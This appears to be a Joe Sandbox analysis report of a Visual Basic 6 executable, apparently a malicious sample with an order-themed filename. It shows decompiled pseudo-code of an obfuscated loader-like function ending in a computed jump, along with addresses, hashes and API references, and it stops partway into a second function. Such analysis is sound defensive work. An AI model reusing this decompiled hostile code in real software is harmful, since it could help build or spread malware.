Opcode ID: 67f0b8e34d47853cf6a4c22e1261e7f6037cc0f43d54427f77b301b0c454f8e2
Instruction ID: 8dd655f31b138ec127f5f94a1bd1adadf35c7e42a9befe1fb7985485b6040f0d
Opcode Fuzzy Hash: 67f0b8e34d47853cf6a4c22e1261e7f6037cc0f43d54427f77b301b0c454f8e2
Instruction Fuzzy Hash: 9C43DC75940229AFDB21EF50CC49BD9B7B4BB48304F1041EAE10ABB2A1DB759EC4DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00411A00, Relevance: 89.9, APIs: 49, Strings: 2, Instructions: 635
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00411A00() {
				signed int _t349;
				signed int _t353;
				intOrPtr _t357;
				signed int _t361;
				signed int _t366;
				signed int _t372;
				signed int _t376;
				intOrPtr _t380;
				signed int _t384;
				signed int _t388;
				signed int _t392;
				signed int _t396;
				signed int _t400;
				intOrPtr _t404;
				signed int _t408;
				signed int _t420;
				signed int _t430;
				signed int _t434;
				intOrPtr _t439;
				signed int _t443;
				void* _t446;
				signed int _t458;
				signed int _t462;
				signed int _t466;
				intOrPtr _t470;
				signed int _t474;
				signed int _t478;
				signed int _t482;
				signed int _t487;
				intOrPtr _t498;
				intOrPtr _t514;
				intOrPtr _t530;
				void* _t532;
				intOrPtr* _t533;
				long long* _t534;
				void* _t535;
				void* _t536;
				intOrPtr* _t537;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t532 - 0x24)) =  *((intOrPtr*)(_t532 - 0x24)) +  *((intOrPtr*)(_t532 - 0x388));
					if( *((intOrPtr*)(_t532 - 0x24)) >  *((intOrPtr*)(_t532 - 0x38c))) {
						break;
					}
					L2:
					 *((intOrPtr*)(_t532 - 4)) = 0x24;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4d8)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4d8)) = 0x416010;
					}
					_t349 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t349;
					_t353 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0xf8))( *(_t532 - 0x2d4), _t532 - 0x294, _t349,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4d8)))))) + 0x374))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4d8))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t353;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x4dc) =  *(_t532 - 0x4dc) & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x40da78);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x4dc) = _t353;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4e0)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4e0)) = 0x416010;
					}
					_t498 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4e0))))));
					_t357 = _t532 - 0x204;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t357;
					_t361 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0x148))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x1f4, _t357,  *((intOrPtr*)(_t498 + 0x31c))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4e0))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t361;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x4e4) =  *(_t532 - 0x4e4) & 0x00000000;
					} else {
						_push(0x148);
						_push(0x40dbd4);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x4e4) = _t361;
					}
					 *((intOrPtr*)(_t532 - 0x2b0)) = 0x8374d8;
					 *((short*)(_t532 - 0x298)) = 0x4435;
					 *_t533 =  *0x4012f8;
					_t366 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x70c))( *((intOrPtr*)(_t532 + 8)),  *((intOrPtr*)(_t532 - 0x294)), _t498, _t532 - 0x298, 0x66936e, _t532 - 0x2b0, 0x26f06a,  *((intOrPtr*)(_t532 - 0x1f4)));
					 *(_t532 - 0x2e4) = _t366;
					if( *(_t532 - 0x2e4) >= 0) {
						 *(_t532 - 0x4e8) =  *(_t532 - 0x4e8) & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2e4));
						L00401558();
						 *(_t532 - 0x4e8) = _t366;
					}
					L00401528();
					_push(_t532 - 0x204);
					_push(_t532 - 0x200);
					_push(2);
					L00401546();
					_t534 = _t533 + 0xc;
					 *((intOrPtr*)(_t532 - 4)) = 0x25;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4ec)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4ec)) = 0x416010;
					}
					_t372 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t372;
					_t376 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0x60))( *(_t532 - 0x2d4), _t532 - 0x2b0, _t372,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4ec)))))) + 0x358))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4ec))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t376;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x4f0) =  *(_t532 - 0x4f0) & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40d96c);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x4f0) = _t376;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4f4)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4f4)) = 0x416010;
					}
					_t380 = _t532 - 0x204;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t380;
					_t384 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0xa8))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x294, _t380,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4f4)))))) + 0x32c))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4f4))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t384;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x4f8) =  *(_t532 - 0x4f8) & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x40dbe4);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x4f8) = _t384;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4fc)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4fc)) = 0x416010;
					}
					_t388 = _t532 - 0x208;
					L0040154C();
					 *(_t532 - 0x2e4) = _t388;
					_t392 =  *((intOrPtr*)( *( *(_t532 - 0x2e4)) + 0xb0))( *(_t532 - 0x2e4), _t532 - 0x298, _t388,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4fc)))))) + 0x344))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4fc))))));
					asm("fclex");
					 *(_t532 - 0x2e8) = _t392;
					if( *(_t532 - 0x2e8) >= 0) {
						 *(_t532 - 0x500) =  *(_t532 - 0x500) & 0x00000000;
					} else {
						_push(0xb0);
						_push(0x40da88);
						_push( *(_t532 - 0x2e4));
						_push( *(_t532 - 0x2e8));
						L00401558();
						 *(_t532 - 0x500) = _t392;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x504)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x504)) = 0x416010;
					}
					_t396 = _t532 - 0x20c;
					L0040154C();
					 *(_t532 - 0x2ec) = _t396;
					_t400 =  *((intOrPtr*)( *( *(_t532 - 0x2ec)) + 0x68))( *(_t532 - 0x2ec), _t532 - 0x2b4, _t396,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x504)))))) + 0x388))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x504))))));
					asm("fclex");
					 *(_t532 - 0x2f0) = _t400;
					if( *(_t532 - 0x2f0) >= 0) {
						 *(_t532 - 0x508) =  *(_t532 - 0x508) & 0x00000000;
					} else {
						_push(0x68);
						_push(0x40dbf4);
						_push( *(_t532 - 0x2ec));
						_push( *(_t532 - 0x2f0));
						L00401558();
						 *(_t532 - 0x508) = _t400;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x50c)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x50c)) = 0x416010;
					}
					_t514 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x50c))))));
					_t404 = _t532 - 0x210;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2f4)) = _t404;
					_t408 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2f4)))) + 0x98))( *((intOrPtr*)(_t532 - 0x2f4)), _t532 - 0x29c, _t404,  *((intOrPtr*)(_t514 + 0x334))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x50c))))));
					asm("fclex");
					 *(_t532 - 0x2f8) = _t408;
					if( *(_t532 - 0x2f8) >= 0) {
						 *(_t532 - 0x510) =  *(_t532 - 0x510) & 0x00000000;
					} else {
						_push(0x98);
						_push(0x40da68);
						_push( *((intOrPtr*)(_t532 - 0x2f4)));
						_push( *(_t532 - 0x2f8));
						L00401558();
						 *(_t532 - 0x510) = _t408;
					}
					 *((short*)(_t532 - 0x2a8)) =  *((intOrPtr*)(_t532 - 0x29c));
					 *((short*)(_t532 - 0x2a4)) =  *((intOrPtr*)(_t532 - 0x298));
					 *((short*)(_t532 - 0x2a0)) =  *((intOrPtr*)(_t532 - 0x294));
					 *((intOrPtr*)(_t532 - 0x2b8)) =  *((intOrPtr*)(_t532 - 0x2b0));
					 *_t534 =  *((intOrPtr*)(_t532 - 0x2b4));
					 *_t534 =  *0x4012f0;
					_t420 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x6fc))( *((intOrPtr*)(_t532 + 8)), _t514, _t514, _t532 - 0x2b8, _t532 - 0x2a0, _t532 - 0x2a4, _t514, _t532 - 0x2a8, _t532 - 0x2ac);
					 *(_t532 - 0x2fc) = _t420;
					if( *(_t532 - 0x2fc) >= 0) {
						 *(_t532 - 0x514) =  *(_t532 - 0x514) & 0x00000000;
					} else {
						_push(0x6fc);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2fc));
						L00401558();
						 *(_t532 - 0x514) = _t420;
					}
					 *((short*)(_t532 - 0x148)) =  *((intOrPtr*)(_t532 - 0x2ac));
					_push(_t532 - 0x210);
					_push(_t532 - 0x20c);
					_push(_t532 - 0x208);
					_push(_t532 - 0x204);
					_push(_t532 - 0x200);
					_push(5);
					L00401546();
					_t535 = _t534 + 0x18;
					 *((intOrPtr*)(_t532 - 4)) = 0x26;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x518)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x518)) = 0x416010;
					}
					_t430 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t430;
					_t434 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0xd0))( *(_t532 - 0x2d4), _t532 - 0x204, _t430,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x518)))))) + 0x308))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x518))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t434;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x51c) =  *(_t532 - 0x51c) & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x40da88);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x51c) = _t434;
					}
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t532 - 0x204)));
					_push(_t532 - 0x220);
					L00401522();
					_t536 = _t535 + 0x10;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x520)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x520)) = 0x416010;
					}
					_t439 = _t532 - 0x208;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t439;
					_t443 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0x78))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x2b0, _t439,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x520)))))) + 0x2fc))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x520))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t443;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x524) =  *(_t532 - 0x524) & 0x00000000;
					} else {
						_push(0x78);
						_push(0x40daa8);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x524) = _t443;
					}
					 *((intOrPtr*)(_t532 - 0x2b4)) =  *((intOrPtr*)(_t532 - 0x2b0));
					 *((long long*)(_t532 - 0x2c8)) =  *0x4012e8;
					_t446 = _t532 - 0x220;
					L0040151C();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x718))( *((intOrPtr*)(_t532 + 8)), _t532 - 0x2c8, _t446, _t446, _t532 - 0x2b4, _t532 - 0x2d0);
					 *((intOrPtr*)(_t532 - 0x158)) =  *((intOrPtr*)(_t532 - 0x2d0));
					 *((intOrPtr*)(_t532 - 0x154)) =  *((intOrPtr*)(_t532 - 0x2cc));
					L00401546();
					_t537 = _t536 + 0x10;
					L00401516();
					 *((intOrPtr*)(_t532 - 4)) = 0x27;
					_t458 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x708))( *((intOrPtr*)(_t532 + 8)), 3, _t532 - 0x200, _t532 - 0x208, _t532 - 0x204);
					 *(_t532 - 0x2d4) = _t458;
					if( *(_t532 - 0x2d4) >= 0) {
						 *(_t532 - 0x528) =  *(_t532 - 0x528) & 0x00000000;
					} else {
						_push(0x708);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2d4));
						L00401558();
						 *(_t532 - 0x528) = _t458;
					}
					 *((intOrPtr*)(_t532 - 4)) = 0x28;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x52c)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x52c)) = 0x416010;
					}
					_t462 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t462;
					_t466 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0x148))( *(_t532 - 0x2d4), _t532 - 0x294, _t462,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x52c)))))) + 0x398))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x52c))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t466;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x530) =  *(_t532 - 0x530) & 0x00000000;
					} else {
						_push(0x148);
						_push(0x40dab8);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x530) = _t466;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x534)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x534)) = 0x416010;
					}
					_t470 = _t532 - 0x204;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t470;
					_t474 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0x70))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x1f4, _t470,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x534)))))) + 0x300))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x534))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t474;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x538) =  *(_t532 - 0x538) & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40dc04);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x538) = _t474;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x53c)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x53c)) = 0x416010;
					}
					_t530 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x53c))))));
					_t478 = _t532 - 0x208;
					L0040154C();
					 *(_t532 - 0x2e4) = _t478;
					_t482 =  *((intOrPtr*)( *( *(_t532 - 0x2e4)) + 0xe8))( *(_t532 - 0x2e4), 0, _t532 - 0x1f8, _t478,  *((intOrPtr*)(_t530 + 0x30c))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x53c))))));
					asm("fclex");
					 *(_t532 - 0x2e8) = _t482;
					if( *(_t532 - 0x2e8) >= 0) {
						 *(_t532 - 0x540) =  *(_t532 - 0x540) & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x40dc14);
						_push( *(_t532 - 0x2e4));
						_push( *(_t532 - 0x2e8));
						L00401558();
						 *(_t532 - 0x540) = _t482;
					}
					 *((long long*)(_t532 - 0x2d0)) =  *0x4012e0;
					 *((intOrPtr*)(_t532 - 0x2c8)) = 0x33f4f430;
					 *((intOrPtr*)(_t532 - 0x2c4)) = 0x5b07;
					 *_t537 =  *0x4012d8;
					_t487 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x704))( *((intOrPtr*)(_t532 + 8)),  *((intOrPtr*)(_t532 - 0x294)), _t532 - 0x2c8, _t530, 0x39a8a8,  *((intOrPtr*)(_t532 - 0x1f4)),  *((intOrPtr*)(_t532 - 0x1f8)), _t532 - 0x2d0);
					 *(_t532 - 0x2ec) = _t487;
					if( *(_t532 - 0x2ec) >= 0) {
						 *(_t532 - 0x544) =  *(_t532 - 0x544) & 0x00000000;
					} else {
						_push(0x704);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2ec));
						L00401558();
						 *(_t532 - 0x544) = _t487;
					}
					L86:
					_push(_t532 - 0x1f8);
					_push(_t532 - 0x1f4);
					_push(2);
					L004014E6();
					_push(_t532 - 0x208);
					_push(_t532 - 0x204);
					_push(_t532 - 0x200);
					_push(3);
					L00401546();
					_t533 = _t537 + 0x1c;
					 *((intOrPtr*)(_t532 - 4)) = 0x29;
				}
				L87:
				 *((intOrPtr*)(_t532 - 4)) = 0x2a;
				 *((intOrPtr*)(_t532 - 0x248)) = 0x80020004;
				 *((intOrPtr*)(_t532 - 0x250)) = 0xa;
				 *((intOrPtr*)(_t532 - 0x238)) = 0x80020004;
				 *((intOrPtr*)(_t532 - 0x240)) = 0xa;
				 *((intOrPtr*)(_t532 - 0x228)) = 0x80020004;
				 *((intOrPtr*)(_t532 - 0x230)) = 0xa;
				 *((intOrPtr*)(_t532 - 0x218)) = 0xff;
				 *((intOrPtr*)(_t532 + 0x2fa)) = 0x400c89;
				 *((intOrPtr*)(_t532 + 0x2fa)) =  *((intOrPtr*)(_t532 + 0x2fa)) - 0xffffd508;
				_push( *((intOrPtr*)(_t532 + 0x2fa)));
				goto __edi;
			}

0x00411a00
0x00411a00
0x00411a00
0x00411a09
0x00411a15
0x00000000
0x00000000
0x00411a1b
0x00411a1b
0x00411a29
0x00411a46
0x00411a2b
0x00411a2b
0x00411a30
0x00411a35
0x00411a3a
0x00411a3a
0x00411a6a
0x00411a71
0x00411a76
0x00411a91
0x00411a97
0x00411a99
0x00411aa6
0x00411acb
0x00411aa8
0x00411aa8
0x00411aad
0x00411ab2
0x00411ab8
0x00411abe
0x00411ac3
0x00411ac3
0x00411ad9
0x00411af6
0x00411adb
0x00411adb
0x00411ae0
0x00411ae5
0x00411aea
0x00411aea
0x00411b10
0x00411b1a
0x00411b21
0x00411b26
0x00411b41
0x00411b47
0x00411b49
0x00411b56
0x00411b7b
0x00411b58
0x00411b58
0x00411b5d
0x00411b62
0x00411b68
0x00411b6e
0x00411b73
0x00411b73
0x00411b82
0x00411b8c
0x00411bba
0x00411bcb
0x00411bd1
0x00411bde
0x00411c00
0x00411be0
0x00411be0
0x00411be5
0x00411bea
0x00411bed
0x00411bf3
0x00411bf8
0x00411bf8
0x00411c0d
0x00411c18
0x00411c1f
0x00411c20
0x00411c22
0x00411c27
0x00411c2a
0x00411c38
0x00411c55
0x00411c3a
0x00411c3a
0x00411c3f
0x00411c44
0x00411c49
0x00411c49
0x00411c79
0x00411c80
0x00411c85
0x00411ca0
0x00411ca3
0x00411ca5
0x00411cb2
0x00411cd4
0x00411cb4
0x00411cb4
0x00411cb6
0x00411cbb
0x00411cc1
0x00411cc7
0x00411ccc
0x00411ccc
0x00411ce2
0x00411cff
0x00411ce4
0x00411ce4
0x00411ce9
0x00411cee
0x00411cf3
0x00411cf3
0x00411d23
0x00411d2a
0x00411d2f
0x00411d4a
0x00411d50
0x00411d52
0x00411d5f
0x00411d84
0x00411d61
0x00411d61
0x00411d66
0x00411d6b
0x00411d71
0x00411d77
0x00411d7c
0x00411d7c
0x00411d92
0x00411daf
0x00411d94
0x00411d94
0x00411d99
0x00411d9e
0x00411da3
0x00411da3
0x00411dd3
0x00411dda
0x00411ddf
0x00411dfa
0x00411e00
0x00411e02
0x00411e0f
0x00411e34
0x00411e11
0x00411e11
0x00411e16
0x00411e1b
0x00411e21
0x00411e27
0x00411e2c
0x00411e2c
0x00411e42
0x00411e5f
0x00411e44
0x00411e44
0x00411e49
0x00411e4e
0x00411e53
0x00411e53
0x00411e83
0x00411e8a
0x00411e8f
0x00411eaa
0x00411ead
0x00411eaf
0x00411ebc
0x00411ede
0x00411ebe
0x00411ebe
0x00411ec0
0x00411ec5
0x00411ecb
0x00411ed1
0x00411ed6
0x00411ed6
0x00411eec
0x00411f09
0x00411eee
0x00411eee
0x00411ef3
0x00411ef8
0x00411efd
0x00411efd
0x00411f23
0x00411f2d
0x00411f34
0x00411f39
0x00411f54
0x00411f5a
0x00411f5c
0x00411f69
0x00411f8e
0x00411f6b
0x00411f6b
0x00411f70
0x00411f75
0x00411f7b
0x00411f81
0x00411f86
0x00411f86
0x00411f9c
0x00411faa
0x00411fb8
0x00411fc5
0x00411fe0
0x00412000
0x0041200b
0x00412011
0x0041201e
0x00412040
0x00412020
0x00412020
0x00412025
0x0041202a
0x0041202d
0x00412033
0x00412038
0x00412038
0x0041204e
0x0041205b
0x00412062
0x00412069
0x00412070
0x00412077
0x00412078
0x0041207a
0x0041207f
0x00412082
0x00412090
0x004120ad
0x00412092
0x00412092
0x00412097
0x0041209c
0x004120a1
0x004120a1
0x004120d1
0x004120d8
0x004120dd
0x004120f8
0x004120fe
0x00412100
0x0041210d
0x00412132
0x0041210f
0x0041210f
0x00412114
0x00412119
0x0041211f
0x00412125
0x0041212a
0x0041212a
0x00412139
0x0041213b
0x0041213d
0x00412149
0x0041214a
0x0041214f
0x00412159
0x00412176
0x0041215b
0x0041215b
0x00412160
0x00412165
0x0041216a
0x0041216a
0x0041219a
0x004121a1
0x004121a6
0x004121c1
0x004121c4
0x004121c6
0x004121d3
0x004121f5
0x004121d5
0x004121d5
0x004121d7
0x004121dc
0x004121e2
0x004121e8
0x004121ed
0x004121ed
0x00412202
0x0041220e
0x00412222
0x00412229
0x0041223e
0x0041224a
0x00412256
0x00412273
0x00412278
0x00412281
0x00412286
0x00412295
0x0041229b
0x004122a8
0x004122ca
0x004122aa
0x004122aa
0x004122af
0x004122b4
0x004122b7
0x004122bd
0x004122c2
0x004122c2
0x004122d1
0x004122df
0x004122fc
0x004122e1
0x004122e1
0x004122e6
0x004122eb
0x004122f0
0x004122f0
0x00412320
0x00412327
0x0041232c
0x00412347
0x0041234d
0x0041234f
0x0041235c
0x00412381
0x0041235e
0x0041235e
0x00412363
0x00412368
0x0041236e
0x00412374
0x00412379
0x00412379
0x0041238f
0x004123ac
0x00412391
0x00412391
0x00412396
0x0041239b
0x004123a0
0x004123a0
0x004123d0
0x004123d7
0x004123dc
0x004123f7
0x004123fa
0x004123fc
0x00412409
0x0041242b
0x0041240b
0x0041240b
0x0041240d
0x00412412
0x00412418
0x0041241e
0x00412423
0x00412423
0x00412439
0x00412456
0x0041243b
0x0041243b
0x00412440
0x00412445
0x0041244a
0x0041244a
0x00412470
0x0041247a
0x00412481
0x00412486
0x004124a3
0x004124a9
0x004124ab
0x004124b8
0x004124dd
0x004124ba
0x004124ba
0x004124bf
0x004124c4
0x004124ca
0x004124d0
0x004124d5
0x004124d5
0x004124ea
0x004124f0
0x004124fa
0x00412523
0x0041253b
0x00412541
0x0041254e
0x00412570
0x00412550
0x00412550
0x00412555
0x0041255a
0x0041255d
0x00412563
0x00412568
0x00412568
0x00412577
0x0041257d
0x00412584
0x00412585
0x00412587
0x00412595
0x0041259c
0x004125a3
0x004125a4
0x004125a6
0x004125ab
0x004125ae
0x004125ae
0x004125ba
0x004125ba
0x004125c1
0x004125cb
0x004125d5
0x004125df
0x004125e9
0x004125f3
0x004125fd
0x00412607
0x00412611
0x0041261b
0x00412624

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411A35
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411A71
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA78,000000F8), ref: 00411ABE
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411AE5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411B21
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DBD4,00000148), ref: 00411B6E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,0000070C,?,00004435,0066936E,008374D8,0026F06A,?), ref: 00411BF3
__vbaFreeStr.MSVBVM60(?,00004435,0066936E,008374D8,0026F06A,?), ref: 00411C0D

Strings

), xrefs: 004125AE
5D, xrefs: 00411B8C

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$New2$Free
String ID: )$5D
API String ID: 4269135739-280663723
Opcode ID: f578ee74e5f61c011dce6e8ea35f8cc6d2cfc1408b1449ad1e6f9ce8f8f747bd
Instruction ID: e0804eaa7c10126f2014de847c2219301eb2009dca5e36e0f886c79f8bb1bf40
Opcode Fuzzy Hash: f578ee74e5f61c011dce6e8ea35f8cc6d2cfc1408b1449ad1e6f9ce8f8f747bd
Instruction Fuzzy Hash: B152EA75940229AFCB20EF50CD49BD9B7B5BB08304F1041EAE10ABB2A1DB759EC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414987, Relevance: 18.1, APIs: 12, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00414987(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr* _v92;
				intOrPtr _v108;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				void* _t48;
				char* _t49;
				void* _t51;
				char* _t54;
				intOrPtr* _t67;
